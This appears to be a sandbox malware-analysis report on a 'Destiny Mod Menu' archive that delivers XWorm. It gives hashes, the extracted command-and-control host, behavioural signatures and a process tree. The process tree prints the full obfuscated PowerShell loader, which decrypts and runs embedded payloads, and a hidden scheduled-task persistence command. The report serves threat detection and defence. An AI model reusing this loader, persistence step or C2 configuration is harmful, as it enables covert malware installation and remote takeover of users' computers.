Overview
overview
10Static
static
1Destiny Mod Menu.rar
windows7-x64
1Destiny Mod Menu.rar
windows10-2004-x64
10Destiny Mo...er.bat
windows7-x64
8Destiny Mo...er.bat
windows10-2004-x64
10Destiny Mo...fe.txt
windows7-x64
1Destiny Mo...fe.txt
windows10-2004-x64
1Destiny Mo...ll.cmd
windows7-x64
1Destiny Mo...ll.cmd
windows10-2004-x64
1Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
04/03/2025, 19:23
Static task
static1
Behavioral task
behavioral1
Sample
Destiny Mod Menu.rar
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Destiny Mod Menu.rar
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
Destiny Mod Menu/Destiny/Proof its Safe.txt
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Destiny Mod Menu/Destiny/Proof its Safe.txt
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
Destiny Mod Menu/Destiny/Unistall.cmd
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
Destiny Mod Menu/Destiny/Unistall.cmd
Resource
win10v2004-20250217-en
General
-
Target
Destiny Mod Menu.rar
-
Size
194KB
-
MD5
d1e398e757c4a3e1c9887296cef12b34
-
SHA1
197c715389fba91d476d395bb0c9439009b9a1da
-
SHA256
10f65b5ff82a1838a20614cc7bf379e8f55c3d46ef9ecaba7837c17ec44ce49f
-
SHA512
bafe205c3727f954d15d3046881a6989b4bd8541f472cdfa5bd22211616f97b5ff591fb45ef159ea910dce30fb98e034ff0bb8f9e237c629e75b59a78504ef28
-
SSDEEP
6144:KR9UeLmjjYjgRT+IZbnVqjmxAvAhZrM/BBDnjMy0VMugzsS:Cyeak0hjZE2AoTWBfpugB
Malware Config
Extracted
xworm
5.0
french-add.gl.at.ply.gg:6536
db7vnqFX7vAc4WLR
-
Install_directory
%ProgramData%
-
install_file
System.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/1716-50-0x000002A7A1EE0000-0x000002A7A1EF0000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 36 1716 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4444 powershell.exe 1260 powershell.exe 1716 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4444 powershell.exe 4444 powershell.exe 4444 powershell.exe 1260 powershell.exe 1260 powershell.exe 1260 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 1768 7zFM.exe 1768 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1768 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1768 7zFM.exe Token: 35 1768 7zFM.exe Token: SeSecurityPrivilege 1768 7zFM.exe Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeIncreaseQuotaPrivilege 1260 powershell.exe Token: SeSecurityPrivilege 1260 powershell.exe Token: SeTakeOwnershipPrivilege 1260 powershell.exe Token: SeLoadDriverPrivilege 1260 powershell.exe Token: SeSystemProfilePrivilege 1260 powershell.exe Token: SeSystemtimePrivilege 1260 powershell.exe Token: SeProfSingleProcessPrivilege 1260 powershell.exe Token: SeIncBasePriorityPrivilege 1260 powershell.exe Token: SeCreatePagefilePrivilege 1260 powershell.exe Token: SeBackupPrivilege 1260 powershell.exe Token: SeRestorePrivilege 1260 powershell.exe Token: SeShutdownPrivilege 1260 powershell.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeSystemEnvironmentPrivilege 1260 powershell.exe Token: SeRemoteShutdownPrivilege 1260 powershell.exe Token: SeUndockPrivilege 1260 powershell.exe Token: SeManageVolumePrivilege 1260 powershell.exe Token: 33 1260 powershell.exe Token: 34 1260 powershell.exe Token: 35 1260 powershell.exe Token: 36 1260 powershell.exe Token: SeIncreaseQuotaPrivilege 1260 powershell.exe Token: SeSecurityPrivilege 1260 powershell.exe Token: SeTakeOwnershipPrivilege 1260 powershell.exe Token: SeLoadDriverPrivilege 1260 powershell.exe Token: SeSystemProfilePrivilege 1260 powershell.exe Token: SeSystemtimePrivilege 1260 powershell.exe Token: SeProfSingleProcessPrivilege 1260 powershell.exe Token: SeIncBasePriorityPrivilege 1260 powershell.exe Token: SeCreatePagefilePrivilege 1260 powershell.exe Token: SeBackupPrivilege 1260 powershell.exe Token: SeRestorePrivilege 1260 powershell.exe Token: SeShutdownPrivilege 1260 powershell.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeSystemEnvironmentPrivilege 1260 powershell.exe Token: SeRemoteShutdownPrivilege 1260 powershell.exe Token: SeUndockPrivilege 1260 powershell.exe Token: SeManageVolumePrivilege 1260 powershell.exe Token: 33 1260 powershell.exe Token: 34 1260 powershell.exe Token: 35 1260 powershell.exe Token: 36 1260 powershell.exe Token: SeIncreaseQuotaPrivilege 1260 powershell.exe Token: SeSecurityPrivilege 1260 powershell.exe Token: SeTakeOwnershipPrivilege 1260 powershell.exe Token: SeLoadDriverPrivilege 1260 powershell.exe Token: SeSystemProfilePrivilege 1260 powershell.exe Token: SeSystemtimePrivilege 1260 powershell.exe Token: SeProfSingleProcessPrivilege 1260 powershell.exe Token: SeIncBasePriorityPrivilege 1260 powershell.exe Token: SeCreatePagefilePrivilege 1260 powershell.exe Token: SeBackupPrivilege 1260 powershell.exe Token: SeRestorePrivilege 1260 powershell.exe Token: SeShutdownPrivilege 1260 powershell.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeSystemEnvironmentPrivilege 1260 powershell.exe Token: SeRemoteShutdownPrivilege 1260 powershell.exe Token: SeUndockPrivilege 1260 powershell.exe Token: SeManageVolumePrivilege 1260 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1768 7zFM.exe 1768 7zFM.exe 1768 7zFM.exe 1768 7zFM.exe 1768 7zFM.exe 1768 7zFM.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1768 7zFM.exe 1768 7zFM.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1768 wrote to memory of 3576 1768 7zFM.exe 97 PID 1768 wrote to memory of 3576 1768 7zFM.exe 97 PID 3576 wrote to memory of 4444 3576 cmd.exe 100 PID 3576 wrote to memory of 4444 3576 cmd.exe 100 PID 4444 wrote to memory of 1260 4444 powershell.exe 101 PID 4444 wrote to memory of 1260 4444 powershell.exe 101 PID 4444 wrote to memory of 4404 4444 powershell.exe 103 PID 4444 wrote to memory of 4404 4444 powershell.exe 103 PID 4404 wrote to memory of 1860 4404 WScript.exe 104 PID 4404 wrote to memory of 1860 4404 WScript.exe 104 PID 1860 wrote to memory of 1716 1860 cmd.exe 106 PID 1860 wrote to memory of 1716 1860 cmd.exe 106
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Destiny Mod Menu.rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zO8E63A5E7\Destiny Loader Installer.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a4Wny3pMw/quq+3CugnkbgjOgDqz7GpqcCoFYQ082Qg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McCcrn5ax83ehqoAfbIc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RELLW=New-Object System.IO.MemoryStream(,$param_var); $KdJRg=New-Object System.IO.MemoryStream; $atmEh=New-Object System.IO.Compression.GZipStream($RELLW, [IO.Compression.CompressionMode]::Decompress); $atmEh.CopyTo($KdJRg); $atmEh.Dispose(); $RELLW.Dispose(); $KdJRg.Dispose(); $KdJRg.ToArray();}function execute_function($param_var,$param2_var){ $LMajr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZqHWQ=$LMajr.EntryPoint; $ZqHWQ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\7zO8E63A5E7\Destiny Loader Installer.bat';$VYMDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\7zO8E63A5E7\Destiny Loader Installer.bat').Split([Environment]::NewLine);foreach ($kwRBK in $VYMDR) { if ($kwRBK.StartsWith(':: ')) { $buoVq=$kwRBK.Substring(3); break; }}$payloads_var=[string[]]$buoVq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_340_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_340.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_340.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_340.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a4Wny3pMw/quq+3CugnkbgjOgDqz7GpqcCoFYQ082Qg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McCcrn5ax83ehqoAfbIc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RELLW=New-Object System.IO.MemoryStream(,$param_var); $KdJRg=New-Object System.IO.MemoryStream; $atmEh=New-Object System.IO.Compression.GZipStream($RELLW, [IO.Compression.CompressionMode]::Decompress); $atmEh.CopyTo($KdJRg); $atmEh.Dispose(); $RELLW.Dispose(); $KdJRg.Dispose(); $KdJRg.ToArray();}function execute_function($param_var,$param2_var){ $LMajr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZqHWQ=$LMajr.EntryPoint; $ZqHWQ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_340.bat';$VYMDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_340.bat').Split([Environment]::NewLine);foreach ($kwRBK in $VYMDR) { if ($kwRBK.StartsWith(':: ')) { $buoVq=$kwRBK.Substring(3); break; }}$payloads_var=[string[]]$buoVq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1716
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5ee6f5f5e5924783870aeedeccdafe9da
SHA10e12ede20df5ec37f2bf3608ad1bc9b4649450fd
SHA256ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416
SHA512998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f
-
Filesize
265KB
MD5512d6ccd633decbe126a38c51c29a280
SHA1017e6fbb5eb2e367f37b4e5c33eb89cafcc7db48
SHA256411b2ce5f266c6b25a645c37e7fd071772810ae5c74cf457db20f43f43277fe5
SHA512fde1138b21117652348ec58f6ea92687fb94b111e0c49b5528d995a8e5e1588e7d1957761ca6eabb1010666f925b77a8032c129ec0839c5797a7e8381af24af7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
115B
MD5071c67e5bbb3741e5051266d93ff5b34
SHA1e3cad92cc444a1057cdf8aad70ae3c5a55856e99
SHA2569bb9867d63f3522d5ba4bce6f86f81acb26de1d3213d8c1d49bfd69a70d1ebca
SHA512232b5c6e540041c3cd971e83dbd763ca09fe673d94c17163dc8cdd21fe432f05f1cb243e526432010620583b22a22efd5718e9588963c91a8922225d2cfc7196